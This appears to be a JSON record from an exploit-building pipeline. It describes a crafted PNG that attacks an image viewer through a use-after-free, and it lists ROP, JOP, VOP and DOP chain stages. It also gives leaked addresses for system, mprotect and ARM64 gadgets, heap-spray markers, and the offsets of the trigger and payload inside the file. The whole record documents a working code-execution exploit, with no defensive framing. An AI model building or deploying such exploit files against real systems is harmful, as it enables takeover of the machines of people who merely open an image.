{
  "file": "sample_109.png.eog.uaf.DOP.png",
  "fuzz_type": "uaf",
  "chain_type": "DOP",
  "unique_id": "pwned_png_consumer_uaf_1783729897_0",
  "attack_chain": [
    "ROP_UAF",
    "JOP_UAF",
    "VOP_UAF",
    "DOP_UAF"
  ],
  "leaked_addresses": {
    "mprotect": "0xe27cdb117c00",
    "system": "0xe27cdb07cec4",
    "payload": "0xb39fa2830100",
    "pop_x0_x1_x2_ret": "0xb39fa2811c20",
    "ldp_x29_x30": "0xb39fa2811c30",
    "pop_x0_x1_x2_x30_br_x0": "0xb39fa2811c40",
    "jump_x0": "0xb39fa2811c50",
    "load_mprotect_x3": "0xb39fa2811c60",
    "load_payload_x0": "0xb39fa2811c70",
    "br_x3": "0xb39fa2811c80",
    "ldr_x0_x1_br_x0": "0xb39fa2811c90",
    "mov_x0_x1_br_x0": "0xb39fa2811ca0",
    "ldr_x1_x0_br_x1": "0xb39fa2811cb0",
    "mov_x1_x0_br_x1": "0xb39fa2811cc0",
    "pop_x0_x1_ret": "0xb39fa2811cd0",
    "pop_x0_ret": "0xb39fa2811ce0",
    "pop_x1_ret": "0xb39fa2811cf0",
    "ldr_x0_sp_br_x0": "0xb39fa2811d00",
    "ldr_x1_sp_br_x1": "0xb39fa2811d10",
    "gadget_vop_fmov": "0xb39fa2811d60",
    "gadget_vop_ldr_str_q0": "0xb39fa2811d70",
    "gadget_mov_x0_x1_br_x0": "0xb39fa2811ca0",
    "gadget_ldr_x0_x1_br_x0": "0xb39fa2811c90"
  },
  "instrumentation_validation": {
    "valid": true,
    "issues": [],
    "warnings": [
      "Multiple FITNESS_OK markers found (2), expected during heap spray - keeping last occurrence only"
    ],
    "embeddings": {
      "ROP chain": 2491462,
      "JOP chain": 2491522,
      "VOP chain": 2491574,
      "DOP chain": 2491682
    },
    "missing_triggers": [],
    "payload_integrity": true,
    "doubtful_fitness_markers": [
      2491933
    ]
  },
  "trigger_alignment": {
    "aligned": true,
    "trigger_offset": 2490332,
    "payload_offset": 2493460,
    "gap_bytes": 3128,
    "alignment_quality": "acceptable",
    "recommendations": [],
    "trigger_type": "uaf",
    "payload_slide": 0
  }
}